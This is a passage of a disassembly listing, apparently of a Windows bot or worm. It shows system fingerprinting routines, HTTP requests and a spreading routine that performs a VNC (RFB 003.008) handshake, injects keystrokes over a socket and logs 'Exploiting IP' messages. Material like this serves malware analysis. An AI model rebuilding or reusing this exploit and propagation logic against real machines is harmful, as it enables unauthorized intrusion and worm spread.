mov ebx, eax
call ds:dword_427080 ; Sleep
rdtsc
sub eax, ebx
push 0
sbb edx, edi
push esi
push edx
push eax
call __aulldiv
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_41AEE1
jb short loc_41AF10
cmp ebx, esi
ja short loc_41AEE1
loc_41AF10: ; CODE XREF: sub_41AED9+31�j
push 0
push 64h
push edi
push ebx
call __aullrem
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_41AF83
jb short loc_41AF2F
cmp esi, 50h
jnb short loc_41AF34
loc_41AF2F: ; CODE XREF: sub_41AED9+4F�j
push 4Bh
xor edx, edx
pop eax
loc_41AF34: ; CODE XREF: sub_41AED9+54�j
test ecx, ecx
ja short loc_41AF83
jb short loc_41AF3F
cmp esi, 47h
jnb short loc_41AF44
loc_41AF3F: ; CODE XREF: sub_41AED9+5F�j
push 42h
xor edx, edx
pop eax
loc_41AF44: ; CODE XREF: sub_41AED9+64�j
test ecx, ecx
ja short loc_41AF83
jb short loc_41AF4F
cmp esi, 37h
jnb short loc_41AF54
loc_41AF4F: ; CODE XREF: sub_41AED9+6F�j
push 32h
xor edx, edx
pop eax
loc_41AF54: ; CODE XREF: sub_41AED9+74�j
test ecx, ecx
ja short loc_41AF83
jb short loc_41AF5F
cmp esi, 26h
jnb short loc_41AF64
loc_41AF5F: ; CODE XREF: sub_41AED9+7F�j
push 21h
xor edx, edx
pop eax
loc_41AF64: ; CODE XREF: sub_41AED9+84�j
test ecx, ecx
ja short loc_41AF83
jb short loc_41AF6F
cmp esi, 1Eh
jnb short loc_41AF74
loc_41AF6F: ; CODE XREF: sub_41AED9+8F�j
push 19h
xor edx, edx
pop eax
loc_41AF74: ; CODE XREF: sub_41AED9+94�j
test ecx, ecx
ja short loc_41AF83
jb short loc_41AF7F
cmp esi, 0Ah
jnb short loc_41AF83
loc_41AF7F: ; CODE XREF: sub_41AED9+9F�j
xor eax, eax
xor edx, edx
loc_41AF83: ; CODE XREF: sub_41AED9+4D�j
; sub_41AED9+5D�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
sub_41AED9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AF8F proc near ; CODE XREF: sub_401ACD+2728�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
FullPath = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
Dest = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
Dst = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
Drive = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7E8h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset byte_43DB88
mov [ebp+var_CC], 94h
call ds:dword_4270D0 ; GetVersionExA
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_41B016
cmp [ebp+var_C4], ebx
jnz short loc_41AFF2
cmp [ebp+var_BC], 1
jnz short loc_41AFDC
mov [ebp+var_4], offset a95 ; "95"
loc_41AFDC: ; CODE XREF: sub_41AF8F+44�j
cmp [ebp+var_BC], 2
jnz loc_41B091
mov [ebp+var_4], offset aNt_0 ; "NT"
jmp short loc_41B062
; ---------------------------------------------------------------------------
loc_41AFF2: ; CODE XREF: sub_41AF8F+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_41B004
mov [ebp+var_4], offset a98 ; "98"
jmp short loc_41B059
; ---------------------------------------------------------------------------
loc_41B004: ; CODE XREF: sub_41AF8F+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_41B052
mov [ebp+var_4], offset aMe_0 ; "ME"
jmp short loc_41B059
; ---------------------------------------------------------------------------
loc_41B016: ; CODE XREF: sub_41AF8F+33�j
cmp [ebp+var_C8], 5
jnz short loc_41B052
cmp [ebp+var_C4], ebx
jnz short loc_41B030
mov [ebp+var_4], offset a2k ; "2K"
jmp short loc_41B059
; ---------------------------------------------------------------------------
loc_41B030: ; CODE XREF: sub_41AF8F+96�j
cmp [ebp+var_C4], 1
jnz short loc_41B042
mov [ebp+var_4], offset aXp ; "XP"
jmp short loc_41B059
; ---------------------------------------------------------------------------
loc_41B042: ; CODE XREF: sub_41AF8F+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_41B059
loc_41B052: ; CODE XREF: sub_41AF8F+7C�j
; sub_41AF8F+8E�j
mov [ebp+var_4], offset a??? ; "???"
loc_41B059: ; CODE XREF: sub_41AF8F+73�j
; sub_41AF8F+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_41B091
loc_41B062: ; CODE XREF: sub_41AF8F+61�j
cmp [ebp+var_B8], bl
jz short loc_41B091
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+Dest]
push [ebp+var_4]
push offset aSS_5 ; "%s (%s)"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
add esp, 10h
mov [ebp+var_4], eax
loc_41B091: ; CODE XREF: sub_41AF8F+54�j
; sub_41AF8F+D1�j ...
mov ax, word_4383AC
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, dword_4CB8B4
mov [ebp+var_C], 100h
cmp eax, ebx
jz short loc_41B0CA
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_41B0CA: ; CODE XREF: sub_41AF8F+12C�j
push [ebp+arg_4]
call sub_40AA06
pop ecx
push eax
call dword_4CBA14 ; inet_addr
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_4CB98C ; gethostbyaddr
cmp eax, ebx
jz short loc_41B0F3
push dword ptr [eax]
jmp short loc_41B0F8
; ---------------------------------------------------------------------------
loc_41B0F3: ; CODE XREF: sub_41AF8F+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_41B0F8: ; CODE XREF: sub_41AF8F+162�j
lea eax, [ebp+var_3E4]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+FullPath]
pop ecx
push 104h
push eax
call ds:dword_42707C ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call ds:dword_427110 ; GetDateFormatA
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_42710C ; GetTimeFormatA
push 20h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
call ds:dword_42719C ; GlobalMemoryStatus
push ebx ; Ext
push ebx ; Filename
lea eax, [ebp+Drive]
push ebx ; Dir
push eax ; Drive
lea eax, [ebp+FullPath]
push eax ; FullPath
call __splitpath
lea eax, [ebp+Drive]
push eax
lea eax, [ebp+var_7E8]
push eax
call sub_416DD9
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_41ADD8
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+FullPath]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
call sub_41AED9
push edx
push eax
push offset asc_43AB9C ; "-"
push 200h ; Count
push [ebp+arg_0] ; Dest
call __snprintf
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_41AF8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B243 proc near ; CODE XREF: sub_401ACD+2756�p
; sub_401ACD+71F5�p
Dst = byte ptr -8Ch
var_C = byte ptr -0Ch
Dest = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
cmp dword_4CBABC, 0
jnz short loc_41B2AF
push 0
lea eax, [ebp+Dst]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call dword_4CB898 ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_41B298
lea eax, [ebp+Dst]
push offset aNotConnected ; "Not connected"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41B298: ; CODE XREF: sub_41B243+40�j
test [ebp+var_C], 1
jz short loc_41B2A5
push offset aDialUp ; "Dial-up"
jmp short loc_41B2AA
; ---------------------------------------------------------------------------
loc_41B2A5: ; CODE XREF: sub_41B243+59�j
push offset dword_43ACE4
loc_41B2AA: ; CODE XREF: sub_41B243+60�j
lea eax, [ebp+Dest]
jmp short loc_41B2C7
; ---------------------------------------------------------------------------
loc_41B2AF: ; CODE XREF: sub_41B243+28�j
mov esi, offset off_43ACE0
lea eax, [ebp+Dest]
push esi ; Format
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+Dst]
pop ecx
push esi ; Format
loc_41B2C7: ; CODE XREF: sub_41B243+6A�j
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+arg_4]
push [ebp+arg_8]
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Dest]
push eax
push offset asc_43AC9C ; "-"
push 200h ; Count
push [ebp+arg_0] ; Dest
call __snprintf
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_41B243 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B302 proc near ; DATA XREF: sub_401ACD+757F�o
var_65C = byte ptr -65Ch
var_55C = dword ptr -55Ch
var_35C = dword ptr -35Ch
Str = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
Dest = byte ptr -1C8h
Dst = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
Source = dword ptr -38h
Count = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_35C]
rep movsd
push 1
mov edi, 80h
pop esi
xor ebx, ebx
mov [eax+190h], esi
push edi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], offset dword_43ADD0
call _memset
push edi ; Size
lea eax, [ebp+Dest]
push ebx ; Val
push eax ; Dst
call _memset
push edi ; Size
lea eax, [ebp+var_C8]
push ebx ; Val
push eax ; Dst
call _memset
push 100h ; Size
lea eax, [ebp+var_65C]
push ebx ; Val
push eax ; Dst
call _memset
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi ; Size
push ebx ; Val
push eax ; Dst
call _memset
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+Count], esi
push eax
lea eax, [ebp+Str]
push ebx
push eax ; Str
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
call dword_4CB8D0 ; InternetCrackUrlA
test eax, eax
jz loc_41B49C
cmp [ebp+Count], ebx
jbe short loc_41B3D9
push [ebp+Count] ; Count
lea eax, [ebp+Dst]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_41B3D9: ; CODE XREF: sub_41B302+C0�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_41B3F7
push [ebp+var_28] ; Count
lea eax, [ebp+Dest]
push [ebp+var_2C] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_41B3F7: ; CODE XREF: sub_41B302+DE�j
cmp [ebp+var_20], ebx
jbe short loc_41B411
push [ebp+var_20] ; Count
lea eax, [ebp+var_C8]
push [ebp+var_24] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_41B411: ; CODE XREF: sub_41B302+F8�j
cmp [ebp+var_18], ebx
jbe short loc_41B42B
push [ebp+var_18] ; Count
lea eax, [ebp+var_65C]
push [ebp+var_1C] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_41B42B: ; CODE XREF: sub_41B302+112�j
push ebx
push ebx
lea eax, [ebp+var_C8]
push 3
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Dst]
push esi
push eax
push dword_4CB984
call dword_4CB9A8 ; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_41B4B4
push ebx
lea eax, [ebp+var_8]
push 200h
push eax
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_65C]
push ebx
push eax
push ebx
push esi
call dword_4CB99C ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_41B4BB
push ebx
push ebx
push ebx
push ebx
push eax
call dword_4CB948 ; HttpSendRequestA
test eax, eax
jz short loc_41B495
push offset dword_43ADB4
jmp short loc_41B4C0
; ---------------------------------------------------------------------------
loc_41B495: ; CODE XREF: sub_41B302+18A�j
push offset unk_43AD78
jmp short loc_41B4C0
; ---------------------------------------------------------------------------
loc_41B49C: ; CODE XREF: sub_41B302+B7�j
lea eax, [ebp+var_55C]
push offset asc_43AD5C ; "-"
push eax ; Dest
call _sprintf
mov esi, [ebp+var_C]
pop ecx
pop ecx
jmp short loc_41B4CE
; ---------------------------------------------------------------------------
loc_41B4B4: ; CODE XREF: sub_41B302+153�j
push offset unk_43AD30
jmp short loc_41B4C0
; ---------------------------------------------------------------------------
loc_41B4BB: ; CODE XREF: sub_41B302+17B�j
push offset asc_43AD00 ; "-"
loc_41B4C0: ; CODE XREF: sub_41B302+191�j
; sub_41B302+198�j ...
lea eax, [ebp+var_55C]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41B4CE: ; CODE XREF: sub_41B302+1B0�j
cmp [ebp+var_1D4], ebx
jnz short loc_41B4F9
push ebx ; int
lea eax, [ebp+var_55C]
push [ebp+var_1D0] ; int
push eax ; int
lea eax, [ebp+var_258]
push eax ; Str
push [ebp+var_35C] ; int
call sub_409869
add esp, 14h
loc_41B4F9: ; CODE XREF: sub_41B302+1D2�j
lea eax, [ebp+var_55C]
push eax
call sub_415D38
pop ecx
push esi
call dword_4CBA08 ; InternetCloseHandle
push [ebp+var_4]
call dword_4CBA08 ; InternetCloseHandle
push [ebp+var_1D8]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_41B302 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B52C proc near ; CODE XREF: sub_401ACD+4F59�p
arg_0 = dword ptr 4
push esi
push 100h ; Size
mov esi, offset byte_4DBCCC
push 0 ; Val
push esi ; Dst
call _memset
add esp, 0Ch
push [esp+4+arg_0]
push offset aS_6 ; "%s"
push 0FFh ; Count
push esi ; Dest
call __snprintf
add esp, 10h
pop esi
retn
sub_41B52C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41B55B(int,char *Str,int)
sub_41B55B proc near ; CODE XREF: .text:0041B843�p
; .text:0041B860�p ...
var_14 = byte ptr -14h
var_C = byte ptr -0Ch
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
mov esi, offset dword_4DBDD4
lea edi, [ebp+var_C]
mov ax, word_43ADD4
movsd
movsb
mov esi, offset dword_4DBDCC
lea edi, [ebp+var_14]
mov [ebp+var_2], ax
mov ax, word_4346DC
movsd
mov [ebp+var_6], ax
mov ax, word_4CB88C
movsw
mov [ebp+var_4], ax
mov eax, [ebp+arg_8]
xor esi, esi
cmp eax, esi
jnz loc_41B627
mov edi, [ebp+arg_0]
push ebx
mov ebx, [ebp+Str]
mov [ebp+arg_8], esi
loc_41B5AD: ; CODE XREF: sub_41B55B+C7�j
mov eax, [ebp+arg_8]
sub eax, esi
jz short loc_41B5CD
dec eax
jnz short loc_41B61B
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_4CBA24 ; send
push esi
push 1
lea eax, [ebp+var_4]
jmp short loc_41B5E1
; ---------------------------------------------------------------------------
loc_41B5CD: ; CODE XREF: sub_41B55B+57�j
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_4CBA24 ; send
push esi
push 1
lea eax, [ebp+var_6]
loc_41B5E1: ; CODE XREF: sub_41B55B+70�j
push eax
push edi
call dword_4CBA24 ; send
push ebx ; Str
call _strlen
pop ecx
cmp eax, 2
push esi
jnz short loc_41B5FD
push 4
lea eax, [ebp+var_C]
jmp short loc_41B602
; ---------------------------------------------------------------------------
loc_41B5FD: ; CODE XREF: sub_41B55B+99�j
push 5
lea eax, [ebp+var_14]
loc_41B602: ; CODE XREF: sub_41B55B+A0�j
push eax
push edi
call dword_4CBA24 ; send
push esi
push ebx ; Str
call _strlen
pop ecx
push eax
push ebx
push edi
call dword_4CBA24 ; send
loc_41B61B: ; CODE XREF: sub_41B55B+5A�j
inc [ebp+arg_8]
cmp [ebp+arg_8], 1
jle short loc_41B5AD
pop ebx
jmp short loc_41B69D
; ---------------------------------------------------------------------------
loc_41B627: ; CODE XREF: sub_41B55B+42�j
dec eax
jz short loc_41B646
dec eax
jnz short loc_41B69D
mov edi, [ebp+arg_0]
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_4CBA24 ; send
push esi
push 1
lea eax, [ebp+var_4]
jmp short loc_41B65D
; ---------------------------------------------------------------------------
loc_41B646: ; CODE XREF: sub_41B55B+CD�j
mov edi, [ebp+arg_0]
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_4CBA24 ; send
push esi
push 1
lea eax, [ebp+var_6]
loc_41B65D: ; CODE XREF: sub_41B55B+E9�j
push eax
push edi
call dword_4CBA24 ; send
push [ebp+Str] ; Str
call _strlen
pop ecx
cmp eax, 2
push esi
jnz short loc_41B67B
push 4
lea eax, [ebp+var_C]
jmp short loc_41B680
; ---------------------------------------------------------------------------
loc_41B67B: ; CODE XREF: sub_41B55B+117�j
push 5
lea eax, [ebp+var_14]
loc_41B680: ; CODE XREF: sub_41B55B+11E�j
push eax
push edi
call dword_4CBA24 ; send
push esi
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
push edi
call dword_4CBA24 ; send
loc_41B69D: ; CODE XREF: sub_41B55B+CA�j
; sub_41B55B+D0�j
pop edi
pop esi
leave
retn
sub_41B55B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 288h
push ebx
push esi
push edi
mov esi, offset aRfb003_008 ; "RFB 003.008\n"
lea edi, [ebp-38h]
mov ax, word_4346DC
movsd
movsd
movsd
movsb
mov esi, offset dword_43ADE8
lea edi, [ebp-1Ch]
movsw
movsb
mov esi, offset dword_4DBDD4
lea edi, [ebp-28h]
movsd
movsb
mov esi, offset dword_43ADE4
lea edi, [ebp-10h]
movsw
movsb
mov esi, offset dword_43ADE0
lea edi, [ebp-14h]
movsw
movsb
mov esi, offset dword_43ADDC
lea edi, [ebp-0Ch]
movsw
movsb
xor esi, esi
mov [ebp-6], ax
mov [ebp-16h], ax
mov ax, word ptr aR ; "r"
push esi
push 1
push 2
mov [ebp-18h], ax
xor edi, edi
call dword_4CBA54 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41B724
push eax
call dword_4CBA6C ; closesocket
loc_41B724: ; CODE XREF: .text:0041B71B�j
lea eax, [ebp+0Ch]
mov word ptr [ebp-48h], 2
push eax
call dword_4CBA14 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-44h], eax
call dword_4CB9D4 ; htons
mov [ebp-46h], ax
lea eax, [ebp-48h]
push 10h
push eax
push ebx
call dword_4CB97C ; connect
test eax, eax
jnz loc_41B820
loc_41B75C: ; CODE XREF: .text:0041B7CE�j
; .text:0041B805�j
push 40h
lea eax, [ebp-88h]
push esi
push eax
call _memset
add esp, 0Ch
lea eax, [ebp-88h]
push esi
push 40h
push eax
push ebx
call dword_4CB9EC ; recv
cmp eax, esi
jle loc_41B82E
cmp eax, 0FFFFFFFFh
jz loc_41B82E
mov eax, edi
sub eax, esi
jz short loc_41B7D0
dec eax
jz short loc_41B79E
dec eax
jz short loc_41B80A
jmp short loc_41B800
; ---------------------------------------------------------------------------
loc_41B79E: ; CODE XREF: .text:0041B797�j
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-88h]
push eax
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_41B820
lea eax, [ebp-6]
push esi
push eax
call _strlen
pop ecx
push eax
lea eax, [ebp-6]
push eax
push ebx
call dword_4CBA24 ; send
push 2
pop edi
jmp short loc_41B75C
; ---------------------------------------------------------------------------
loc_41B7D0: ; CODE XREF: .text:0041B794�j
lea eax, [ebp-38h]
push eax
lea eax, [ebp-88h]
push eax
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_41B820
lea eax, [ebp-38h]
push esi
push eax
call _strlen
pop ecx
push eax
lea eax, [ebp-38h]
push eax
push ebx
call dword_4CBA24 ; send
push 1
pop edi
loc_41B800: ; CODE XREF: .text:0041B79C�j
cmp edi, 3
jz short loc_41B82E
jmp loc_41B75C
; ---------------------------------------------------------------------------
loc_41B80A: ; CODE XREF: .text:0041B79A�j
lea eax, [ebp-28h]
push eax
lea eax, [ebp-88h]
push eax
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_41B82E
loc_41B820: ; CODE XREF: .text:0041B756�j
; .text:0041B7B2�j ...
push ebx
call dword_4CBA6C ; closesocket
xor eax, eax
jmp loc_41B9B7
; ---------------------------------------------------------------------------
loc_41B82E: ; CODE XREF: .text:0041B781�j
; .text:0041B78A�j ...
push esi
lea eax, [ebp-16h]
push 1
push eax
push ebx
call dword_4CBA24 ; send
lea eax, [ebp-10h]
push 1
push eax
push ebx
call sub_41B55B
mov esi, ds:dword_427080
add esp, 0Ch
mov edi, 3E8h
push edi
call esi ; Sleep
lea eax, [ebp-18h]
push 0
push eax
push ebx
call sub_41B55B
add esp, 0Ch
push edi
call esi ; Sleep
lea eax, [ebp-10h]
push 2
push eax
push ebx
call sub_41B55B
add esp, 0Ch
push edi
call esi ; Sleep
and dword ptr [ebp-4], 0
mov edi, offset byte_4DBCCC
push edi
call _strlen
test eax, eax
pop ecx
jbe short loc_41B8CE
loc_41B891: ; CODE XREF: .text:0041B8CC�j
mov eax, [ebp-4]
movsx eax, byte_4DBCCC[eax]
push eax
push offset dword_43ADD8
lea eax, [ebp-20h]
push 3
push eax
call __snprintf
lea eax, [ebp-20h]
push 0
push eax
push ebx
call sub_41B55B
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-4]
push edi
call _strlen
cmp [ebp-4], eax
pop ecx
jb short loc_41B891
loc_41B8CE: ; CODE XREF: .text:0041B88F�j
lea eax, [ebp-0Ch]
push 0
push eax
push ebx
call sub_41B55B
add esp, 0Ch
push 0FA0h
call esi ; Sleep
push 2
pop edi
loc_41B8E7: ; CODE XREF: .text:0041B8FE�j
lea eax, [ebp-14h]
push 0
push eax
push ebx
call sub_41B55B
add esp, 0Ch
push 12Ch
call esi ; Sleep
dec edi
jnz short loc_41B8E7
mov edi, 7D0h
push edi
call esi ; Sleep
lea eax, [ebp-0Ch]
push 0
push eax
push ebx
call sub_41B55B
add esp, 0Ch
push edi
call esi ; Sleep
xor edi, edi
lea eax, [ebp-14h]
push edi
push eax
push ebx
call sub_41B55B
add esp, 0Ch
push 190h
call esi ; Sleep
mov dword ptr [ebp-4], 2
loc_41B938: ; CODE XREF: .text:0041B950�j
push 258h
call esi ; Sleep
lea eax, [ebp-0Ch]
push edi
push eax
push ebx
call sub_41B55B
add esp, 0Ch
dec dword ptr [ebp-4]
jnz short loc_41B938
push ebx
call dword_4CBA6C ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
shl eax, 6
add eax, offset aSymantec ; "Symantec"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-288h]
push 1FFh
push eax
call __snprintf
push edi
lea eax, [ebp-288h]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_409869
mov eax, [ebp+0B0h]
add esp, 28h
shl eax, 6
inc dword_431800[eax]
push 1
lea eax, dword_431800[eax]
pop eax
loc_41B9B7: ; CODE XREF: .text:0041B829�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
align 10h
; [0000007B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION _fclose. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA91 proc near ; CODE XREF: sub_4010AB+5E�p
; sub_40A928+B1�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_41BAF7
mov eax, dword_4DD388
cmp eax, 3
jnz short loc_41BABD
push esi
call ___sbh_find_block
pop ecx
test eax, eax
push esi
jz short loc_41BAE9
push eax
call sub_41E742
pop ecx
pop ecx
jmp short loc_41BAF7
; ---------------------------------------------------------------------------
loc_41BABD: ; CODE XREF: sub_41BA91+14�j
cmp eax, 2
jnz short loc_41BAE8
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_4]
push eax
push esi
call sub_41F472
add esp, 0Ch
test eax, eax
jz short loc_41BAE8
push eax
push [ebp+arg_0]
push [ebp+var_4]
call sub_41F4C9
add esp, 0Ch
jmp short loc_41BAF7
; ---------------------------------------------------------------------------
loc_41BAE8: ; CODE XREF: sub_41BA91+2F�j
; sub_41BA91+44�j
push esi
loc_41BAE9: ; CODE XREF: sub_41BA91+20�j
push 0
push dword_4DD384
call ds:dword_42714C ; RtlFreeHeap
loc_41BAF7: ; CODE XREF: sub_41BA91+A�j
; sub_41BA91+2A�j ...
pop esi
leave
retn
sub_41BA91 endp
; [000000E8 BYTES: COLLAPSED FUNCTION _fread. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41BBE2(void *Src,size_t Size)
sub_41BBE2 proc near ; CODE XREF: sub_4010AB+2E�p
; __onexit+35�p
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+Src], 0
push ebx
push esi
push edi
jnz short loc_41BBFD
push [ebp+Size] ; Size
call _malloc
pop ecx
jmp loc_41BE7D
; ---------------------------------------------------------------------------
loc_41BBFD: ; CODE XREF: sub_41BBE2+B�j
mov esi, [ebp+Size]
test esi, esi
jnz short loc_41BC12
push [ebp+Src]
call sub_41BA91
pop ecx
jmp loc_41BE7B
; ---------------------------------------------------------------------------
loc_41BC12: ; CODE XREF: sub_41BBE2+20�j
mov eax, dword_4DD388
cmp eax, 3
jnz loc_41BD22
loc_41BC20: ; CODE XREF: sub_41BBE2+12E�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41BCFE
push [ebp+Src]
call ___sbh_find_block
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_41BCD9
cmp esi, dword_4DD380
ja short loc_41BC92
mov edi, [ebp+Src]
push esi
push edi
push ebx
call ___sbh_resize_block
add esp, 0Ch
test eax, eax
jnz short loc_41BC8E
push esi
call ___sbh_alloc_block
mov edi, eax
pop ecx
test edi, edi
jz short loc_41BC92
mov ebx, [ebp+Src]
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_41BC72
mov eax, esi
loc_41BC72: ; CODE XREF: sub_41BBE2+8C�j
push eax ; Size
push ebx ; Src
push edi ; Dst
call _memcpy
push ebx
call ___sbh_find_block
push [ebp+Src]
mov ebx, eax
push ebx
call sub_41E742
